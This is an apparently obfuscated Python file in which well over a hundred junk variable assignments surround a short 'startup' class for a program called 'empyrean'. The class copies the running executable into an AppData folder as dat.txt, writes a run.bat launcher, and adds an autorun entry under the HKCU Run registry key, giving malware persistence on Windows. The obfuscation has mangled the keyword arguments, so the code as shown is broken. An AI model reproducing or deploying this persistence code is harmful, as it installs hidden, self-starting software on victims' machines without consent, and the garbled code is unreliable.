lIlIIIIlIIlIlIIIlllllIIlIIIIllIIIIIIlllllIIIIllIlIllIIIIlIIIIlIllIlllIIIlIIIlllllIllIlIllIIIIIIIIIllIlIlIIllIlIIIllllIIlIIIIIlIIIIIIllIIlIIIIIlIlIllIIlIIIIIllIIIlIIIlIlllIIIIIIIlllIl = 367
LCDCNVITfKylZQazcrhnLiWpbkahMblAplGbSJunNSuOHWvanFHSTlxShvAemPDjmONpSftBNeKcEMY180 = "jGnaUkjUqwxazRrUttgjNIjIXoZjaOJQCfOzSIdgdNisIaluXKerMDypPaJFIJnQsviBajUNKOPLDla"
IIllIIIIlIIlIIIlllIlIllIlIIIlllIlIIIlllllllIIIlIllllllIIllIlllIIIlllIIIIlllllIIlIIlIIllIIllIlIIlIIlIIIlIlIIIIlllIllllIIIlllllIlIllIIIIlIIlIIlIlIlIIIIIIIllIIIlllIIIllllIlIIIIIIIIl = "DVgKXALyAlbXrAQszwmFfUjBKZeDnDDoxcEcKUGtyNHShTrLkKTPhJhwudKFgmRFbwbCRgkAntTZiLn"
AaaaAAAAaAAaaAaAAaAAaaaaaAAaaaaAaaAaaaAaAAAaAAAAaaaaaaaaAaaAAaAaAaaAAAAAAaAAaAaAAAaaaAAaaaaaaAaaaaAAAaAaaAaaaaAAaaAaAaAaaAaaAaaAaaaaAAaAaAAaAaaAaAAaAaAaaaaAAAaAaAaAaAAaaaAaAAAA = "DkVfwMRKWoKETaGqOEYezaPwDveFBBYSDpteFJrCFgHkkpdZfRvGsmIRVEGSZyrpeuKvBPFmCkkSmzk"
I174 = 288
W16790034943411536172 = "zoxzBkjyDSiGCsRDppNJTvUnBOrHzuyDOXdJBZYMFBYnyehcGodLcpofFoAcPiFNmuIcwUulSxMTDVA"
AdrzjQSqwuOKbzGNJLwcqNzMlSdsmbvUjrJyNKVrnncvckssxdaOpRvJSqCnPSkwlYNbDGNpCLTXKaE170 = 813
b16790034943411536168 = 687
SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS = 536
YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY = "AtgDuhXigXpDssCdGooABFuOUlANufaMcIuDlEUcqUTTsFGgxmYZCYXdGfYeUDXdAnuohcDhntQzuDW"
f16790034943401544162 = 425
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv = 328
l158 = "QLbHwATemUjgrqotTchEpNSleTQriaCUAgHVWkYPbFZuqpErgyeUYkgnVrBeuOvNtXgaQzYRYMBaVEj"
rdypFPVZQwmrtTGnIWRXSrhoPHNdpFhvcTLuebUBEnnCxSpAPHEdYhuYraUuFszgYTdtIPAzfrzSRLV156 = 632
i154 = 878
FQTkbWhOyFiTDHKbzqWVoMfAEdaVTNlwnZXIBcGYvBVxwEyWoNBOHrbrQkLTyjHIULKgbYyJsbAsFyE152 = 474
T150 = "gfWPliobWklJAObhKHptBUKoHShjKdNFNAlGljCTNrUyzrQAmNWPyWdDoiNpgGvILScXQlJdxmsPhbw"
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy = "PmgvlyUUKoRuaLuDdjxuvMLPUXGJcHuqEOCUfgLjkotByednauXhfaQboQJgVdDjFnwqOSJdInLGmuq"
lllIIIllIlIIlllllllIIIIIllIIIIIllllIllIlIlllIlIIlllllIllIIIIlIllIllIIlllIllIlllIIIllIlIIIlIlIIllIIlIIlllllIlllIIlllIIlIIIIllIIIlllIllIlIllIIlllIII = 189
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC = 397
i16790034943401544142 = "OvhbSXwGrKLGJCrSKJrsTbXdNNpwMNifqSAhPJzzIGNZVftzDknBXpQwmamTwYfShCmKNkAodPgpwSr"
GiLapqJfnciBJQWOlXVnwZdQNDMkbxPhQNlcuyUGKTQykeqYxibOCJjpoXEIwXkjvaVSSZjGEJhgamU140 = 353
e138 = 309
E136 = 214
mjBvtaIlmYjzdNpYRPdebbKksLSKdfydIScHwxugAecgGAoAbAZRBiXNtTNomLznTeIoxTBUnIcysoz134 = 391
i132 = 613
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW = 619
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = "KQJOoEcfxIKsSptbJSPBNWLWBwOeQJdyIcqDCGroUThMePRXxiVzgQXdeOqTGaSthIBiDmiRFYZtNtg"
aAAaaAAaaAAAAAaAaAAAAaAAAAaaAAaAAAaAaAAAAaaAaaaAaAaAAaAaAaaaaAAaAaaaAaAAaaAAAaaaaAaAaAaaAaAaaaAAAaAAAaAAAAaAaaaaAaaaAaaaAAaAAA = 326
xOnvaSiGKbNRUnBnxNvBndTOizPlqPZIjgDRQdjQwNSPWgJSTCAItUqpGIgNYymQCsnOOStkDAYVsZg124 = 506
T122 = "ePebijqFVDEabXhCeqAhwppFsigazeAVIdmZXoTLwSDiLMnZPvSTsealvHLSqzuofbpSnUqLSlGRZZv"
oTrBVobgaaBLcTOEtwlxGnLFonJSLkhiBTqgplzEVbsVcRGqoWjjvOWRITjceChvrReWsMRtfZKwDhe120 = 329
s118 = "rGChtdGrpibQxFmaQNAIjYcVQZQvNbcshJySTVjcORWhNHPSDQsDYkjoiyHsleQUqAKWLRkFQZLgFWQ"
lIllIIIlIlIllIIIIIlIIlIlIIIIlIIlllllllIIlIIlllIIlIlllIIIlIIIIIlIIlIlIIlIIlllllllIIIIIIlIIlIllllllllllllIIIIllIIIllII = 297
aAaaaAaAaAaAaaAaaAAAaaAaaaaaAAAAaaAaaaaaAAAaaaaAAaaAAAaaAaAAaaaAaaAaaAAAaAaAaAaAAaAaAAAAAAAAaAAAaaaaAAAAaaAAAAaAAA = 697
aAAaaaaAAAAAaAaaaaaAaAaAAAaAAaaAaAAAaaAAaAaAaaAaAaaaaaaaaaAaAaAaaaAaaaAaaaaaAAAaAaAaaaAAAAAaAaaaaaaaAAaAAaaAaaaa = "GodpKoXYCQkBuzczABkCwtndpQPZnztpBvJsftoLdIlGeLmHXwoqzyDTkjuUazLQMsmWnKaBxrlfWYh"
AAAaaAAaAAAAAAAaaAAAaaAaaAaaAAaAAAaAaaaAAaAaaaAaAAaaaaaAAAAAaAAaaAAAaaaaaAaaaaAAAAaAAaAaAaaAaAaaaaAaAAaAAAAaAA = 338
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM = "AxKDdbOvzeuWtmNUYDYLiLDDJaITrylvBwIALNUQXxpWxjIEbgyIsRBdskiMhOUKaOBTTqXzPzkiWHY"
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG = 222
i104 = "yFVkHwCCtudKrRGenqPHrmCsHIKMRvJJQlmDnLmDhEXIoQmMMJRTFQwhlwcEpHiyFTPMVxonxpNKLuO"
L102 = 301
AaAAaAaaAAAAaaaAAAaAaaAAAAAAAAAAAaaAAAAAaaaAaAaAAAAaAAAAAaaaAAAaaAaaaaAaaAAaaAaaaAAaaaAAAAAaAAaaaaAa = "IvLnpBSLdfcPnxjXuubBysyhbGaoSaKPngQRHkLBuqbnWOpaCfKnrFbXnkGZMUpxaHEkfFBSOUoBkDw"
AAaaaAAaAaAAaaAaAAaAAAAAAaAaAAaaaAAAAAaAAaaaaAaaaAAAaaaAaAAaAAAaaaaaAaaaaaaaAaaaAaAAAAaAAAAaaAaaAA = "ptofNPXfXsXVPQkBGZnOcNocyzlOjTZOlVxaNMIaiPbiERZzKuXtnwucInFTDzXaHrCHrsxkPeLrZFz"
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = 196
OqgFPNarrJZgoGSKhcQsjqpxpARljirFCwBdqmrFBELaPThDrIRTeTJJyrIxNgBeSIMxJJLSvScjuUo94 = 449
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN = "pPnmaPfaplwCJsJhcYoQigSZHLEhMdjOePJRQqzOwbKGeLYecqMDIjUPnsSpoSburyfUgygYefVuqTz"
EQhNjEkMgrJwXqgVNialQeBROAEYnNsqQldAHPjsCeNvXAztkijIAZjwZfgvyIpekEtssifBGGwhACD90 = "ybidaeseyysMeceeMPilIhJWcEBTZgcciMUiUBgVvztocvLquSsSeJinryWVQSVngLorJZuPKbwxgIQ"
AaAaAAAAAAAaAaaaAAAAaAAaaaaAAaaaaAAAaaAaaAAAaaaaaaaaAaaaaaaaaAaAaAAAaAaaaAaAAaAaAaAAaaaA = 355
ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss = 583
AAaaAAaAaaaaAAAaAAaaAaAaaAAAAaAaaAAaAAaAAAAaaaaaAaaaaAAaaAaAaAaaaAAaAAaaAaaAaaAAAAaa = 491
H1679003494337635382 = 310
aaaAaAAAaAAAAaaaaAaaaAAAAAAAAaaAAaAaaAaaaaaaAAAAaAaAAaaAAaaAaAaAaaAAaAAaAAAAaAaa = "pRKUXKrvHjnMAwDgLBRmcTeXsQbcsDXxLtmOhOoySPnmycPSKfoyuUZdgCVgfllvkynzpMJEZERXgxG"
IlIlIIlIIIIlIIllllllIllIlIlIllllIllIIIlllIlIIIlIIIIlllIlIIIIIIlIllIIIIlllIlIII = "fSkgbZHIJnjdKPyEjKpRsOSvrIEJFLrEQUQcrtKMDSPDOZWcFYQaNVUVLSJCMQxeHTXODWknNUurDqD"
IIllIlllIllIIIIlIllIlllIlIIIIIIIIlllIIllIIIlIllIIIIIIIllIlllIllIlIlIIIlllIlI = 450
lIIlIIlIIllIIlIllIIlIllIlIlllIIllllllIIIlIlIIIllllIIIlIIlIlllIIlllllllIlll = "vuOkSBDwmLbvrYxbnWAZZxKmCeGCqUGjQJLhfbanfpQVYorrdmqyONfbsFYbafGyBccVeVisfSrvTVX"
CzlthrhnfapWKeImfeKCGZuXTHYJAWSHrfjPXZYZVyXLPyadCOUdWzzIcatQCIBYgQqECVuKKoaVNRv72 = 462
M1679003494337635370 = "xMkMGvRzStZpEZeRJjJPvQpFZRvYMDzNcYnoLGNIGwUYNrWCNLbCUWrwdSXWPmMxgaJGaYUmpSkVhqk"
YVjhmIirGtddXBzdNfpBOYMVIJEvgeXZTPseQDIcLccQHCXhzcFOibIUdaLxIjbyyaTSmMtoTdbgUda68 = 317
IIIlIlIlIllIIlllIIlIlIIIIIlIlIlIlIIlllllIIlllIIIllllIlIIllIlIlIlII = "UmppNotYySmbLDPwbrNYriHNzEyUBGyegCgEDGhwzdAcAKPUdzPyVYhGyWAizohDVrZSIGEzkTtTXZr"
lIllIIlIlIIIIIIIIlIIIIlIIlllIlIllIIIlIlIIIlllIIIIllIIIIIlIIIlIll = 635
AAaaAaAaaaaAAaaAAAaaAAAAaaAaaAaaaAaaaaaAaAAAaAAAAaaaaaaAAaaaAa = "rMEKDGBAySVlXbqvukzlVuTQMvjzHhxgNwSSQGYfucAgkJhBPHNBWgqLiFIcFJtktNYUbcimMPOsucE"
h60 = "GcCPsUGOpmjdiycsXlSrofMeLHWxhKNQiAPUGHhNynPwGlxNKFmozxFHxczqbtZZvpTqDfbeipQaPeu"
llIllllllIIlIllllllIllIllIlIlIlllIIIlIIIIIIlllIlIIIIIIlIlI = 376
IlIIIIIlIlIIIlIIIIlIllIIllIIllIIIIlIlIlllIIIIllIllllllll = "eKYRWTldBeUqLnMwnsllftweVeEFWqVJshpYnIKIlCLouVdbMVhxJidfVRWgYoCBixwOvkuXgTqIMFU"
lIlIIllIIllIlIlIlIlIlllllIIIIlIllIlllllIllIllIIIlIlIIl = 325
aaaaaaAaaAAAAaAAAaAaAaaAAaaAaaaaAaaaaaaaAAAaAaaaAaaa = 554
l50 = "WpeoGzIsMqwhfOXwXmvWGHgtBUJxegipCxiDnwXYAudaJyxATUGXwiLSxCIfjPrtZJRNYrJTxKGMJbF"
zgwtJhROsLldIdfAeBBrpRvUBmOtTzyTQHWokXsrSdVqVVWqDBsLQzRUgwhhykhXwDBwtZyTcbTJgry48 = "lvDshpAabPlmBAuawCPozfuvSjdLCHxnxhWMqepHeXouYyhEaJiOJXfzmXeTZZEvJimGUsTBAwpcWlg"
aAaaAAAAAAaaaAAAaAAAAaAaAaAaaAaaAAaaAAAAaaAAAa = "WufOeycrFEUSYEqncBMOemZxCkKZSPjoKuchCrQWthqITWHLekDidNayedVrKQXeyUZWBLrUhbeCQEJ"
T44 = 389
w42 = "WKNnRKWOrTvqrErVDOhzklyGXooIcFhJQjAUnILVELgaIZJoAdvffjkROUEglINJxrTXWSAdDurLnAP"
QsvRBsBEfUALjvqUpDyxIOBnmnhGILDWoaAQEfseLMNVqgAUBpSdpeWGvXmmHNKjOocfFTJjIqNwKFQ40 = 310
o38 = 690
IllIllIIIIllIIIlIlIllIlllIlIIlIIIlII = 105
I1679003494336634634 = "mlUZQfEtDxdnDLzJadhQqIVYHehzJPAQatEqgCDbAHGzBoilBQIRWCdUBiFSqkYGUyviBmkdVKiPbNo"
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN = "gtEcvuMWEFGFllBivLHauEervxfARrKxjqbjGBXsmfrZQcOGhxbphReDNKeKEdhgiJhksdrZhloxhBT"
grbhaiLtTAvjxayvScPaWdXSpAEqLURAXadxrXKHYGNrXDIPjmVLrrjzEPRScwNWDriOlNZwRwnuwhP30 = "iPaqFUzYgSiMHyYRJaVLjPfXzbJAJbZKUpZKlgSxbVkQjHVJKoYLnByOBiSmDFmhwqoebeMGLpVKcpA"
W28 = "pGefTVEvPDWJxyHSVOOOJCqIFVKlUjgmHvsXATuXXeDyqliZulWSEhFHkEujqPjYIzowrNmdkjHKcLs"
KgNxhPFvrOkMxGPAVvjDTdBhGxXdcAyYgNKbGZznMzpoKpqNTZOhsHFuvoUcESCfIBdFIweePaFdgqO26 = "yZDqiBLRlGjkYmBSHEgnHlTnahPcKSneQclcxlimeOZWUVSrSxxYNPFclwxVOYbGZhFSyZcUKQveJnB"
IIIlIIlIIIIIllllllIlIllI = 289
H22 = "EvkxyZjRXHNVNPOATNmIvfeLLnKFHnQnZQFQPYwnOlPRqgYXILXizUEfbqmNMjgPZpQftdxOEQOlaDO"
AaaaAaaAaaaAaAaaaAAa = "BfBbYNmmqiGJykHNebXZzifAHdTSCYUlFvqXHcLHDZjmNECjORwJUTjoAykVNGKykbsORJnowPKMQqr"
IIIlIlllIlIlllIlIl = "JRqNajjzHyebdWmEzwScsVuyZboiZdAtoteiimFVPKAiwbeleePCOwVVQtmhWhXjdKnpBOkcbjyVHsv"
q1679003494335636416 = "vZjrkqbYZhnWKCrJbFTJQKbXavklofGaHzFNyrZnGjsYvFeyyQYmTQjQDNgKEdouFGaLNhkiyFYDYyj"
aAaaaAAaAaaAAa = "nlRuIhAvWKnlwSBDpgIzAokchWZQNHNVqHajcTuGVmurBqKSWFPjhnPwtHeQjsFCQTafZstiXcjxhDM"
DlJmiJTJdyonGvgFrCFuvOmSvIybxKwVmjgeUEZJmglNLhCpXZglLAGZQYlSLCXfrJXfjMyjEpSCdgq12 = "uXrIjykyaKcFIudBglaSxlzksiDonHoDLtIdeNgFtmYiCNpAZkoFNaQCJJEywXawqRvlpKQcoPtAUdi"
pVhBNaTDrXGcJTsqxeuuycYBgqMaeYuFwkoafqXCRERhAaubYWwzrlHwFlVabCscofhINHztmzlMgMo10 = 454
IIIIIIII = "NELFJIFWeXSSYZAzPKMfLXKsetnLidqSyKNPpzdZWaRCtKwGJJzKPfHWtXYfsagyAvrGUQFUrjgcJiL"
mgUbzGnKTjXzcUndudwVoOanjbAyiaSPWdfQiKNHIlZlttsueUlGuiURBKZZojdnPEhZEXFYAuhndha6 = "clsBMZVSGxKutFxhYeuAxNXbErjOyKZFltAQvNJILiBOeBIdOdOohUAmHRMkTvbkadyXHbiIXBcxFdy"
lIIl = "HItVJjXPpoxjboVzxQXrXBwIwScVGCeCZpaPaMAvTQEODNvfrZvIItKeWMeyyVTdQqBHlfTxqHOxhJJ"
AA = 302

import subprocess
import os
import shutil
import sys
 
class startup:
    def __init__(self) -> None:        
        self.working_dir = os.getenv("APPDATA") + "\\empyrean"
    
        if self.check_self():
            return

        self.mkdir()
        self.write_stub()
        self.regedit()
    
    def check_self(self) -> bool:
        if os.path.realpath(sys.executable) == self.working_dir + "\\dat.txt":
            return True

        return False
    
    def mkdir(self) -> str:
        if not os.path.isdir(self.working_dir):
            os.mkdir(self.working_dir)
        
        else:
            shutil.rmtree(self.working_dir)
            os.mkdir(self.working_dir)
    
    def write_stub(self) -> None:
        shutil.copy2(os.path.realpath(sys.executable), self.working_dir + "\\dat.txt")
        
        with open(Il=f"{self.working_dir}\\run.bat", ZZZ="w") as f:
            f.write(f"@echo off\ncall {self.working_dir}\\dat.txt")
    
    def regedit(self) -> None:
        subprocess.run(AAaA=["reg", "delete", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "empyrean", "/f"], FdwgbTEQhesbyGanaUgJKrNWUXNaQRwphJJEEuXrCYypOlaHdQzgHdAwUtyIhdqWWPqzVNfKNgbNPAP5=True)
        subprocess.run(AAaA=["reg", "add", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "/v", "empyrean", "/t", "REG_SZ", "/d", f"{self.working_dir}\\run.bat", "/f"], FdwgbTEQhesbyGanaUgJKrNWUXNaQRwphJJEEuXrCYypOlaHdQzgHdAwUtyIhdqWWPqzVNfKNgbNPAP5=True)
Z167900349433563641 = 165
o3 = 627
IllII = 676
pgbtfQTCEtVuRaWQvvTfaClCAQIGIknNTHxqnJwpjRLisxxPCYYrCHakyxPXEhSzVHBtZoEnYtkwpyK7 = "aLMQoncnbWnNnDlTbxCsUoMfbRxRinAwOFyaeboxKVMzlURazjzuPBHEddlWHWNOeLZRZUWPANJHrvV"
XfkyEZVnwdkDlwQttIOuJXxDeZjybGTIVBihQAbwqyHWPfEgdcQGGnLrrwzaHknsltoizqTZATBvZfn9 = "EKJjLecvQslFBQfSKYZxdlEPKnckkFVIIsuoBOCcWDBnYoujdiIJOmUASQcTyQFVhkBgUQnaOnrWaHx"
RRRRRRRRRRR = 439
aaAAAAaAaaAAA = 629
X15 = "pWvnQheuRMreMOXJPmZwfXjxQFuxraGATjlkqPKvfTIdjTrqSxEHFnYRXlEjXGHZtgFeNyrabAiJBuU"
k17 = 285
AaaaaaaAaAAaAaaaaaA = "zdGJGphGiwzROaGQPMJNDhhEBMAbyoIEToKMuXalsxrnRYmHsWASevyveqKwTZudgEDPtEvtARFNTwf"
aAaAAAaAAAAAAaaAAAAAA = "HfIjsWQGtEDfxTNBBiCyewQPULKvrJwnvxfhQNXWmQZnIFbvdiZBhqCoSxuTJulTXeGdCRNEMaVIEuj"
KKDvPmgSoWwNGgbwFxeKefvUVQsLTspCXRuiLRnWoaqLzITFaaakeGCEOyVDwZdheHkSxMAyOKakJMI23 = "kJdvSGkuTiPJMAgIxxczsIAkPuHFAZLPwWUdHddZEkvMJBzHczEpkSkVInlbBjdDKVPOjfltGXwkmKX"
IIIlIIlIIIIIlIlIIllllIIll = "VPyPlPRTzVOFHQjxaHcmnJEqwxGlHJKDiVOUUtGvnfaXHVVHBVnVfUfMruzFNNQHAGEcTiduFQEcjnM"
IIIIIllIllIlIIlIIIllIIllllI = 574
dDAyJRclFZEUyfxxFQJWlaIszkUoNPYWoPwHYgsaECnIAAgkaAWEpTyBDJyIcLCnnxMevvqFuRyYtVo29 = 369
llIIIlllIlIlIlIIIIIIIIlIlIlIlII = "YqHzZIcTwITFQMAguVUgqXoHaaQZdbQHMCbMTaeyfTRuCTJNfdPXWOthFKpLIDRGaeaJqSkGVzyLEly"
lIIlIIlllIIIIllIlIIllIIIIlIllIIIl = "cXahadzqUiVovnAvmrzgcTupAKQIiSfxMTEDxcYssVEglJMJurlkWxRPpXuoGxslfiOLQJogXKimcOQ"
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC = 322
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa = "UvXJFprYhevDByiXwhhrsVOcgmpblafaFumxtVrQyXqOqqkNLeQZBMueeVIaylWzmYcNnSyvuPfjvfv"
l39 = 525
Y41 = "KjlHRXxcnXVKxQlcBhGxMzsHfCbAnmyStGVFsGDMZeMaSwCIXcpvWeAVKJmGPcSkwyNHfzSZTWWptBm"
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ = 351
OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = "WvtYbRFsDjfPVHAFbeXAyjdWFwnHzNUiAVndFvnEDgMYyPRerpuIjkJxBMwuVEfKhDPGEzBcWHIxSDJ"
D1679003494336634647 = "tRVeEuxitPLcBTDjOpYJyaOFBTURDRwtLDxWxpwoOoVupdJzKBdBmZTxvvFEnzWHSpJyOeCYVmRBFcm"
nxjElsFXikeEHOtzyShcwbhCsynMPRbiRIenbVNCZIzrObdpcVYLUrUyekAvMRoGkCwpIpphwtAUnug49 = "xTdPXXJaKsEwDrgHktGdflcVLRbWUMtXNCVnwumOOooRwOnqvLOYWEKzyJTHtjNBDwzVCkoEmlHWuVT"
i51 = 822
AlPEkZNYMLfqBcrXEQGbQyLAiNzWxPkRKaEFzycOGFFOEPjKSKALQlIbeoQkfzNvKniLFDDstasLzkh53 = 311
t1679003494336634655 = "ZJTYPxCCxjAFxmmkuVhHxEypuUrVuCBDyrWDZlDIfalJnmwkplMvCmBFTYiaKFMQAxBteuHUGGIriUS"
lIIlllIIIlIlIlIIIIIlIIIllIIlIIIlllllllIIllIlIIlIIIIllllII = "IOEkMjtmjrmUqCBKoIvKqGjmXuGBZqRUvtfUJLfGnNAZeprmCVndqWZjrFOmitWBCTerJcoSuzCptxf"
G1679003494336634659 = 233
llIIllIIlIlllIlIIIIlIIlIIlIlIIIlllIllIlIllIlIIlllIllIIlIIIIll = 281
m63 = 609
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD = "ZvEJWxPveTowiEFRBpGKBoVXwxiyAYbrSGagYWgDXARbnMpPclYeKjEVJgvSvEiDqtDxCXZTTkxYrpA"
A67 = "LFxzTiBSmNFYORYWmFGSKleccTToWHPIsrLuDuIidUHyDhznFzZEWokZtjaDHIQAqHrySLdgjzWyKSL"
aaaAaaaAaaAaaaaaAaAAaAaaAAAaaaAaAAaaAAaAAAAaAaAAaAAaaaaaAAAaAAaaaAaaA = 280
z1679003494337635371 = 467
IIlIIlIlllIIIIllllIlIlllllIllIIlIllIlIIllIIlIlIlIllIllIlllllIIIllIlllIIII = "TBRjmioUEWzoTraRkAchhwSuGaYlSRdbDKJThtmyMBoaxgVHmTXZxPyCSitsirQqORkaJBBGQJCNxCQ"
RFfIBUEcYOWLRuYSQbymipdxscYULltLkuduWQJVSRVFOcxXItwYnRqfLphPyTBqxzTkxocmvVeraCz75 = 319
lIIlIIIlIIIllIllIIIIllllIIIllIIIlIIlllIlIIlIlIIlIlllIIlIlllIIlIlIllIlIlIIIIII = 398
llllIIIllIllIlIlllIIlllIIlIlIIlIlIIIllIlIlIIlIIIllIllIIIIIIlllllIlIlIlIlIllIIll = 309
vrfvCIhUFlGkaBhyXJPhyidOZsADBEUomoaNRIOuteOZULaTxDtrbvbMikVZVaIQbsRyYNvPoVCYenx81 = "rpRaFPgznAkVxKgoYHaUlplMFpmeDktjDNryyqScitizxEVYnHrOcXyityOzBDgjvPFzJgryjjZqZGb"
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF = 348
fTIgBYOZndFMAPkcGUOyBbjZXfAtghlkCqQCnsEDRzaaUiybEwSePyGCZfGsjBOIZOuUZZufNKzAqiT85 = 333
IIIIIIlIlIIIIllllIIIlIIIlIllIllIIIlIlIlIIIIIllllIIIlIllIlIIIIlIlIllIIIlllIlIIllIllIIlIl = "tveIDKtHAQDtpUttqcahylGZZLqapGvdyMUQZZVGFzJDcYFYjMVXNuuaesEsYYqRVxKaMljmUeGUXRu"
lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll = 739
F91 = "OLVHzVPMFYdjCKZsofkDLgJeRmWVYlOFeugPrZcDCqBcQEVNgwvPLpDVUgmgfTAHoUABxjVPxAguyIk"
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB = "lWxkPpSwdFUGioClBORxzGtWpgkmMHiXlgvOJWziVAhxoyaTSwiamsOdNSgzBAcnZLsfbNfsBxMDOme"
d16790034943386495 = 564
QOhDvdvxdWtUUONHnRqeGwfQYZWxWGycUjagYmQoAkFFRgLnibrtZUTdfLczagLLSJGFXvfGeRKpBRG97 = 225
AAAAAAAAAaAAaAaAaaAAAAaAaaAaAAAaAAAAAAAaaaAAAAAaaAaaaAAAAaAaaAaAaAAAAAAaaAAaAAaaaaaaAaAAaaaaAaAAAAA = "QKEQVONOnoykrptqEbvtUoWNuWcCiTGejacxIamLBzezcYUEGfJeFAPHkfvtOGHEtgWEZCNaLbabXDd"
C101 = 369
IllllllIIIlIIIIlIIIllIlllIllllIlIIIllIlIlIlIIllIllIlIIIlIIlIlllIllIIllIIIlIIIIIIlllIIIIIIIlIllllIlIIlIl = "qJWwcDFEMCTerwNXybvLRRVkAreGeQOJIrCWgGWdBbwbzCWyUkhnhsQARjnnsUeZsUrUnBHRDmueWBH"
IAsjWruJzctQWrOQONLJhbnnpHdbQCuOLpBUeXiQaKqWcZivuLIWESnZWfvyxJjBuSQgkaVypunTiJH105 = 313
b16790034943391623107 = "YECsvTtcmoxfgLabErnGRyntSEkUSyRgtSuXDSdgflKeKCIaKbtQcKYFtZftIrXGmmpVKXutviHoGfx"
L109 = "jfHpqHMvhiQhDZDjIsJgaRNbWwmjuqSSNLNIanXPDKljKqXkWjkhrNmhOMezrZLtTDhTstZoUGjEobY"
JRmVaLqgdCUGdAHLBmYEfURwSlRMMHRWyZzhOhaEEbwfMHrJznyNgtXBQaTvKCtbbDBiLCEmwdkDCNJ111 = "HzsEUSZpeFClByspdwiLlbCyrNgbkYCwIwffKLgbOtjoqniMzdJJKhngmNeVPKNviIIDKqyabJuvSQa"
u113 = 208
IIIlllIlIIIlllIlIlllIlIIllIlIIllIlIIlllIlIlllllIIllIlllIlIIllllIIIIIIllIlIIIIlIIIIlIIIllIIlllllIIIlllllllIlIIIIllll = "VfQxEwILdonwqRweGaVGPKDxQUOWOSzpMHJwAXiJnEubyVvwuKdDfbNDOtkleThwRclcUhFEIljMOWX"
AAaAaaAAaaaaAaAaAAaAaaaAAAAAaaAaaaaaAAaaAAAAaaaAAaAAaaaaAAaaAaaAAaAaaaaaaAAAaAaAaAaaAaaaAaaAaAAaaaAaAAaaAAaaaAaaaAAAa = 335
P119 = 344
E121 = 359
TtDWzVtNcXYuSpUDyhGRBfXJJJVJvCBlHuXhXvodyeUqqrCTINOCbtfxJFzvgdNpdGTpZYlSdnlerPm123 = "SgPhYBIsesSVdNnLnVTfZjrOtDRFTySIAiqLlenAEKnqECeUmodsqhKocGFzmHLueZczRhSbtPthOYF"
llIlIIIlIlIlIlIIIlllIIlIlIlIllIllIlIlllIlIIllllIIlIlIIIIlIllllIlllIIlIIIlIllIIIllIIIIlIllIIllllIlIIlIllIlIIIlIlIlllIIIlIIIIIl = "EjYYgVSPMtpgXnygvUNqZNccLohsQGDDrwAkMQFDzDJidqZTjehYirrFMoaJrmEsZGreDExihsbmRyc"
